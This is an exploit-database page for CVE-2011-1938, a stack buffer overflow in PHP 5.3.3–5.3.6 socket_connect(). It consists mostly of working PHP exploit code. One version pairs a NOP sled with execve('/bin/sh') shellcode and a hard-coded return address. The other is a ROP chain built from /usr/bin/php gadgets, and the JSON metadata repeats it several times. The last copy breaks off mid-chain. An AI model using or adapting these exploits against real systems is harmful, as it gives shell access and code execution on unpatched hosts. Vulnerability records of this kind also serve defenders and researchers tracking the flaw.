Search...

PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

2011-05-26T00:00:00

ID SSV:20582
Type seebug
Reporter Root
Modified 2011-05-26T00:00:00

Description

No description provided by source.

                                        
                                            
                                                &lt;?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
 
echo &quot;[+] CVE-2011-1938&quot;;
echo &quot;[+] there we go...\n&quot;;
define('EVIL_SPACE_ADDR', &quot;\xff\xff\xee\xb3&quot;);
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
        &quot;\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0&quot;.
        &quot;\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1&quot;.
        &quot;\xcd\x80&quot;;
echo &quot;[+] creating the sled.\n&quot;;
 
$CODE = str_repeat(&quot;\x90&quot;, EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
        $i &lt; strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
 
$b = str_repeat(&quot;A&quot;, 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo &quot;[+] popping shell, have fun (if you picked the right address...)\n&quot;;
$var85 = socket_connect($var79,$b);
?&gt;

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-20582", "status": "poc", "bulletinFamily": "exploit", "modified": "2011-05-26T00:00:00", "title": "PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20582", "cvelist": ["CVE-2011-1938"], "description": "No description provided by source.", "viewCount": 7, "published": "2011-05-26T00:00:00", "sourceData": "\n <?php\r\n// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian\r\n// Affected Versions: 5.3.3-5.3.6\r\n \r\necho "[+] CVE-2011-1938";\r\necho "[+] there we go...\\n";\r\ndefine('EVIL_SPACE_ADDR', "\\xff\\xff\\xee\\xb3");\r\ndefine('EVIL_SPACE_SIZE', 1024*1024*8);\r\n$SHELLCODE =\r\n "\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0".\r\n "\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1".\r\n "\\xcd\\x80";\r\necho "[+] creating the sled.\\n";\r\n \r\n$CODE = str_repeat("\\x90", EVIL_SPACE_SIZE);\r\nfor ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;\r\n $i < strlen($SHELLCODE) ; $i++, $j++) {\r\n$CODE[$j] = $SHELLCODE[$i];\r\n}\r\n \r\n$b = str_repeat("A", 196).EVIL_SPACE_ADDR;\r\n$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);\r\necho "[+] popping shell, have fun (if you picked the right address...)\\n";\r\n$var85 = socket_connect($var79,$b);\r\n?>\n ", "id": "SSV:20582", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:03:40", "reporter": "Root", "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2017-11-19T18:03:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1938"]}, {"type": "seebug", "idList": ["SSV:71847", "SSV:20694", "SSV:71717"]}, {"type": "zdt", "idList": ["1337DAY-ID-16457"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231070716", "OPENVAS:136141256231071962", "OPENVAS:136141256231070257", "OPENVAS:863523", "OPENVAS:70716", "OPENVAS:863520", "OPENVAS:1361412562310902436", "OPENVAS:71962", "OPENVAS:863875", "OPENVAS:70257"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102751", "PACKETSTORM:101665"]}, {"type": "exploitdb", "idList": ["EDB-ID:17318", "EDB-ID:17486"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E01EEEA67E34582F2A422D4CD1795D05", "EXPLOITPACK:DCB6D1527114BF4939903A3FD787537D"]}, {"type": "freebsd", "idList": ["057BF770-CAC4-11E0-AEA3-00215C6A37BB"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12164", "SECURITYVULNS:DOC:28070", "SECURITYVULNS:DOC:26931", "SECURITYVULNS:VULN:11879"]}, {"type": "slackware", "idList": ["SSA-2011-237-01"]}, {"type": "nessus", "idList": ["FEDORA_2011-11528.NASL", "FEDORA_2011-11464.NASL", "ALA_ALAS-2011-07.NASL", "SLACKWARE_SSA_2011-237-01.NASL", "UBUNTU_USN-1231-1.NASL", "ALA_ALAS-2011-7.NASL", "MANDRIVA_MDVSA-2011-165.NASL", "FREEBSD_PKG_057BF770CAC411E0AEA300215C6A37BB.NASL", "FEDORA_2011-11537.NASL", "DEBIAN_DSA-2399.NASL"]}, {"type": "fedora", "idList": ["FEDORA:836B9C0AD2", "FEDORA:2AA70C0AD2", "FEDORA:7F9E2C0AD1", "FEDORA:420B0E7205", "FEDORA:805B3C0ACF", "FEDORA:510BA87E81", "FEDORA:25045C0AD1", "FEDORA:6126137D07", "FEDORA:7869DC0ACF"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2399-2:BC1FA", "DEBIAN:DSA-2399-1:367BF"]}, {"type": "amazon", "idList": ["ALAS-2011-007"]}, {"type": "f5", "idList": ["SOL15903"]}, {"type": "ubuntu", "idList": ["USN-1231-1"]}, {"type": "centos", "idList": ["CESA-2011:1423"]}, {"type": "redhat", "idList": ["RHSA-2011:1423"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-1046", "ELSA-2011-1423"]}], "modified": "2017-11-19T18:03:40", "rev": 2}, "vulnersScore": 7.2}, "references": []}

{"cve": [{"lastseen": "2020-10-03T11:39:27", "description": "Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary code via a long pathname for a UNIX socket.", "edition": 3, "cvss3": {}, "published": "2011-05-31T20:55:00", "title": "CVE-2011-1938", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1938"], "modified": "2017-08-17T01:34:00", "cpe": ["cpe:/a:php:php:5.3.4", "cpe:/a:php:php:5.3.6", "cpe:/a:php:php:5.3.5", "cpe:/a:php:php:5.3.3"], "id": "CVE-2011-1938", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1938", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T18:02:12", "description": "No description provided by source.", "published": "2011-07-05T00:00:00", "title": "PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2011-07-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20694", "id": "SSV:20694", "sourceData": "\n <?php\r\n/*\r\n** Jonathan Salwan - @shell_storm\r\n** http://shell-storm.org\r\n** 2011-06-04\r\n**\r\n** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938\r\n**\r\n** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c\r\n** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary\r\n** code via a long pathname for a UNIX socket.\r\n*/\r\n \r\necho "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\\n";\r\necho "[+] CVE-2011-1938\\n\\n";\r\n \r\n# Gadgets in /usr/bin/php\r\ndefine('DUMMY', "\\x42\\x42\\x42\\x42"); // padding\r\ndefine('STACK', "\\x20\\xba\\x74\\x08"); // .data 0x46a0 0x874ba20\r\ndefine('STACK4', "\\x24\\xba\\x74\\x08"); // STACK + 4\r\ndefine('STACK8', "\\x28\\xba\\x74\\x08"); // STACK + 8\r\ndefine('STACK12', "\\x3c\\xba\\x74\\x08"); // STACK + 12\r\ndefine('INT_80', "\\x27\\xb6\\x07\\x08"); // 0x0807b627: int $0x80\r\ndefine('INC_EAX', "\\x66\\x50\\x0f\\x08"); // 0x080f5066: inc %eax | ret\r\ndefine('XOR_EAX', "\\x60\\xb4\\x09\\x08"); // 0x0809b460: xor %eax,%eax | ret\r\ndefine('MOV_A_D', "\\x84\\x3e\\x12\\x08"); // 0x08123e84: mov %eax,(%edx) | ret\r\ndefine('POP_EBP', "\\xc7\\x48\\x06\\x08"); // 0x080648c7: pop %ebp | ret\r\ndefine('MOV_B_A', "\\x18\\x45\\x06\\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('MOV_DI_DX', "\\x20\\x26\\x07\\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('POP_EDI', "\\x23\\x26\\x07\\x08"); // 0x08072623: pop %edi | pop %ebp | ret\r\ndefine('POP_EBX', "\\x0f\\x4d\\x21\\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('XOR_ECX', "\\xe3\\x3b\\x1f\\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret\r\n \r\n$padd = str_repeat("A", 196);\r\n \r\n$payload = POP_EDI. // pop %edi\r\n STACK. // 0x874ba20\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n "//bi". // pop %ebp\r\n MOV_B_A. // mov %ebp,%eax\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n MOV_A_D. // mov %eax,(%edx)\r\n POP_EDI. // pop %edi\r\n STACK4. // 0x874ba24\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n "n/sh". // pop %ebp\r\n MOV_B_A. // mov %ebp,%eax\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n MOV_A_D. // mov %eax,(%edx)\r\n POP_EDI. // pop %edi\r\n STACK8. // 0x874ba28\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n XOR_EAX. // xor %eax,%eax\r\n MOV_A_D. // mov %eax,(%edx)\r\n XOR_ECX. // xor %ecx,%ecx\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n POP_EBX. // pop %ebx\r\n STACK. // 0x874ba20\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n XOR_EAX. // xor %eax,%eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INT_80; // int $0x80\r\n \r\n$evil = $padd.$payload;\r\n \r\n$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);\r\n$ret = socket_connect($fd, $evil);\r\n?>\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20694"}, {"lastseen": "2017-11-19T13:51:41", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71717", "id": "SSV:71717", "sourceData": "\n <?php\r\n// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian \r\n// Affected Versions: 5.3.3-5.3.6 \r\n\r\necho "[+] CVE-2011-1938";\r\necho "[+] there we go...\\n";\r\ndefine('EVIL_SPACE_ADDR', "\\xff\\xff\\xee\\xb3");\r\ndefine('EVIL_SPACE_SIZE', 1024*1024*8);\r\n$SHELLCODE = \r\n "\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0".\r\n "\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1".\r\n "\\xcd\\x80";\r\necho "[+] creating the sled.\\n";\r\n\r\n$CODE = str_repeat("\\x90", EVIL_SPACE_SIZE);\r\nfor ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;\r\n $i < strlen($SHELLCODE) ; $i++, $j++) {\r\n$CODE[$j] = $SHELLCODE[$i];\r\n}\r\n\r\n$b = str_repeat("A", 196).EVIL_SPACE_ADDR;\r\n$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);\r\necho "[+] popping shell, have fun (if you picked the right address...)\\n";\r\n$var85 = socket_connect($var79,$b);\r\n?>\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71717"}, {"lastseen": "2017-11-19T17:09:59", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "PHP 5.3.6 - Buffer Overflow PoC (ROP)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71847", "id": "SSV:71847", "sourceData": "\n <?php\r\n/*\r\n** Jonathan Salwan - @jonathansalwan\r\n** http://shell-storm.org\r\n** 2011-06-04\r\n**\r\n** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938\r\n**\r\n** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c\r\n** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary\r\n** code via a long pathname for a UNIX socket.\r\n*/\r\n\r\necho "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\\n";\r\necho "[+] CVE-2011-1938\\n\\n";\r\n\r\n# Gadgets in /usr/bin/php\r\ndefine('DUMMY', "\\x42\\x42\\x42\\x42"); // padding\r\ndefine('STACK', "\\x20\\xba\\x74\\x08"); // .data 0x46a0 0x874ba20\r\ndefine('STACK4', "\\x24\\xba\\x74\\x08"); // STACK + 4\r\ndefine('STACK8', "\\x28\\xba\\x74\\x08"); // STACK + 8\r\ndefine('STACK12', "\\x3c\\xba\\x74\\x08"); // STACK + 12\r\ndefine('INT_80', "\\x27\\xb6\\x07\\x08"); // 0x0807b627: int $0x80\r\ndefine('INC_EAX', "\\x66\\x50\\x0f\\x08"); // 0x080f5066: inc %eax | ret\r\ndefine('XOR_EAX', "\\x60\\xb4\\x09\\x08"); // 0x0809b460: xor %eax,%eax | ret\r\ndefine('MOV_A_D', "\\x84\\x3e\\x12\\x08"); // 0x08123e84: mov %eax,(%edx) | ret\r\ndefine('POP_EBP', "\\xc7\\x48\\x06\\x08"); // 0x080648c7: pop %ebp | ret\r\ndefine('MOV_B_A', "\\x18\\x45\\x06\\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('MOV_DI_DX', "\\x20\\x26\\x07\\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('POP_EDI', "\\x23\\x26\\x07\\x08"); // 0x08072623: pop %edi | pop %ebp | ret\r\ndefine('POP_EBX', "\\x0f\\x4d\\x21\\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('XOR_ECX', "\\xe3\\x3b\\x1f\\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret\r\n\r\n$padd = str_repeat("A", 196);\r\n\r\n$payload = POP_EDI. // pop %edi\r\n STACK. // 0x874ba20\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n "//bi". // pop %ebp\r\n MOV_B_A. // mov %ebp,%eax\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n MOV_A_D. // mov %eax,(%edx)\r\n POP_EDI. // pop %edi\r\n STACK4. // 0x874ba24\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n "n/sh". // pop %ebp\r\n MOV_B_A. // mov %ebp,%eax\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n MOV_A_D. // mov %eax,(%edx)\r\n POP_EDI. // pop %edi\r\n STACK8. // 0x874ba28\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n XOR_EAX. // xor %eax,%eax\r\n MOV_A_D. // mov %eax,(%edx)\r\n XOR_ECX. // xor %ecx,%ecx\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n POP_EBX. // pop %ebx\r\n STACK. // 0x874ba20\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n XOR_EAX. // xor %eax,%eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INT_80; // int $0x80\r\n\r\n$evil = $padd.$payload;\r\n\r\n$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);\r\n$ret = socket_connect($fd, $evil);\r\n?>\r\n\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71847"}], "zdt": [{"lastseen": "2018-04-02T05:28:56", "edition": 2, "description": "Exploit for multiple platform in category local exploits", "published": "2011-07-04T00:00:00", "type": "zdt", "title": "PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-07-04T00:00:00", "id": "1337DAY-ID-16457", "href": "https://0day.today/exploit/description/16457", "sourceData": "<?php\r\n/*\r\n** Jonathan Salwan - @shell_storm\r\n** http://shell-storm.org\r\n** 2011-06-04\r\n**\r\n** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938\r\n**\r\n** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c\r\n** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary\r\n** code via a long pathname for a UNIX socket.\r\n*/\r\n \r\necho \"[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\\n\";\r\necho \"[+] CVE-2011-1938\\n\\n\";\r\n \r\n# Gadgets in /usr/bin/php\r\ndefine('DUMMY', \"\\x42\\x42\\x42\\x42\"); // padding\r\ndefine('STACK', \"\\x20\\xba\\x74\\x08\"); // .data 0x46a0 0x874ba20\r\ndefine('STACK4', \"\\x24\\xba\\x74\\x08\"); // STACK + 4\r\ndefine('STACK8', \"\\x28\\xba\\x74\\x08\"); // STACK + 8\r\ndefine('STACK12', \"\\x3c\\xba\\x74\\x08\"); // STACK + 12\r\ndefine('INT_80', \"\\x27\\xb6\\x07\\x08\"); // 0x0807b627: int $0x80\r\ndefine('INC_EAX', \"\\x66\\x50\\x0f\\x08\"); // 0x080f5066: inc %eax | ret\r\ndefine('XOR_EAX', \"\\x60\\xb4\\x09\\x08\"); // 0x0809b460: xor %eax,%eax | ret\r\ndefine('MOV_A_D', \"\\x84\\x3e\\x12\\x08\"); // 0x08123e84: mov %eax,(%edx) | ret\r\ndefine('POP_EBP', \"\\xc7\\x48\\x06\\x08\"); // 0x080648c7: pop %ebp | ret\r\ndefine('MOV_B_A', \"\\x18\\x45\\x06\\x08\"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('MOV_DI_DX', \"\\x20\\x26\\x07\\x08\"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('POP_EDI', \"\\x23\\x26\\x07\\x08\"); // 0x08072623: pop %edi | pop %ebp | ret\r\ndefine('POP_EBX', \"\\x0f\\x4d\\x21\\x08\"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret\r\ndefine('XOR_ECX', \"\\xe3\\x3b\\x1f\\x08\"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret\r\n \r\n$padd = str_repeat(\"A\", 196);\r\n \r\n$payload = POP_EDI. // pop %edi\r\n STACK. // 0x874ba20\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n \"//bi\". // pop %ebp\r\n MOV_B_A. // mov %ebp,%eax\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n MOV_A_D. // mov %eax,(%edx)\r\n POP_EDI. // pop %edi\r\n STACK4. // 0x874ba24\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n \"n/sh\". // pop %ebp\r\n MOV_B_A. // mov %ebp,%eax\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n MOV_A_D. // mov %eax,(%edx)\r\n POP_EDI. // pop %edi\r\n STACK8. // 0x874ba28\r\n DUMMY. // pop %ebp\r\n MOV_DI_DX. // mov %edi,%edx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n XOR_EAX. // xor %eax,%eax\r\n MOV_A_D. // mov %eax,(%edx)\r\n XOR_ECX. // xor %ecx,%ecx\r\n DUMMY. // pop %ebx\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n POP_EBX. // pop %ebx\r\n STACK. // 0x874ba20\r\n DUMMY. // pop %esi\r\n DUMMY. // pop %edi\r\n DUMMY. // pop %ebp\r\n XOR_EAX. // xor %eax,%eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INC_EAX. // inc %eax\r\n INT_80; // int $0x80\r\n \r\n$evil = $padd.$payload;\r\n \r\n$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);\r\n$ret = socket_connect($fd, $evil);\r\n?>\r\n\r\n\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16457"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:40", "description": "\nPHP 5.3.6 - Local Buffer Overflow (ROP)", "edition": 1, "published": "2011-07-04T00:00:00", "title": "PHP 5.3.6 - Local Buffer Overflow (ROP)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1938"], "modified": "2011-07-04T00:00:00", "id": "EXPLOITPACK:DCB6D1527114BF4939903A3FD787537D", "href": "", "sourceData": "<?php\n/*\n** Jonathan Salwan - @jonathansalwan\n** http://shell-storm.org\n** 2011-06-04\n**\n** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938\n**\n** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c\n** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary\n** code via a long pathname for a UNIX socket.\n*/\n\necho \"[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\\n\";\necho \"[+] CVE-2011-1938\\n\\n\";\n\n# Gadgets in /usr/bin/php\ndefine('DUMMY', \"\\x42\\x42\\x42\\x42\"); // padding\ndefine('STACK', \"\\x20\\xba\\x74\\x08\"); // .data 0x46a0 0x874ba20\ndefine('STACK4', \"\\x24\\xba\\x74\\x08\"); // STACK + 4\ndefine('STACK8', \"\\x28\\xba\\x74\\x08\"); // STACK + 8\ndefine('STACK12', \"\\x3c\\xba\\x74\\x08\"); // STACK + 12\ndefine('INT_80', \"\\x27\\xb6\\x07\\x08\"); // 0x0807b627: int $0x80\ndefine('INC_EAX', \"\\x66\\x50\\x0f\\x08\"); // 0x080f5066: inc %eax | ret\ndefine('XOR_EAX', \"\\x60\\xb4\\x09\\x08\"); // 0x0809b460: xor %eax,%eax | ret\ndefine('MOV_A_D', \"\\x84\\x3e\\x12\\x08\"); // 0x08123e84: mov %eax,(%edx) | ret\ndefine('POP_EBP', \"\\xc7\\x48\\x06\\x08\"); // 0x080648c7: pop %ebp | ret\ndefine('MOV_B_A', \"\\x18\\x45\\x06\\x08\"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret\ndefine('MOV_DI_DX', \"\\x20\\x26\\x07\\x08\"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret\ndefine('POP_EDI', \"\\x23\\x26\\x07\\x08\"); // 0x08072623: pop %edi | pop %ebp | ret\ndefine('POP_EBX', \"\\x0f\\x4d\\x21\\x08\"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret\ndefine('XOR_ECX', \"\\xe3\\x3b\\x1f\\x08\"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret\n\n$padd = str_repeat(\"A\", 196);\n\n$payload = POP_EDI. // pop %edi\n STACK. // 0x874ba20\n DUMMY. // pop %ebp\n MOV_DI_DX. // mov %edi,%edx\n DUMMY. // pop %esi\n DUMMY. // pop %edi\n \"//bi\". // pop %ebp\n MOV_B_A. // mov %ebp,%eax\n DUMMY. // pop %ebx\n DUMMY. // pop %esi\n DUMMY. // pop %edi\n DUMMY. // pop %ebp\n MOV_A_D. // mov %eax,(%edx)\n POP_EDI. // pop %edi\n STACK4. // 0x874ba24\n DUMMY. // pop %ebp\n MOV_DI_DX. // mov %edi,%edx\n DUMMY. // pop %esi\n DUMMY. // pop %edi\n \"n/sh\". // pop %ebp\n MOV_B_A. // mov %ebp,%eax\n DUMMY. // pop %ebx\n DUMMY. // pop %esi\n DUMMY. // pop %edi\n DUMMY. // pop %ebp\n MOV_A_D. // mov %eax,(%edx)\n POP_EDI. // pop %edi\n STACK8. // 0x874ba28\n DUMMY. // pop %ebp\n MOV_DI_DX. // mov %edi,%edx\n DUMMY. // pop %esi\n DUMMY. // pop %edi\n DUMMY. // pop %ebp\n XOR_EAX. // xor %eax,%eax\n MOV_A_D. // mov %eax,(%edx)\n XOR_ECX. // xor %ecx,%ecx\n DUMMY. // pop %ebx\n DUMMY. // pop %esi\n DUMMY. // pop %edi\n DUMMY. // pop %ebp\n POP_EBX. // pop %ebx\n STACK. // 0x874ba20\n DUMMY. // pop %esi\n DUMMY. // pop %edi\n DUMMY. // pop %ebp\n XOR_EAX. // xor %eax,%eax\n INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n INC_EAX. // inc %eax\n 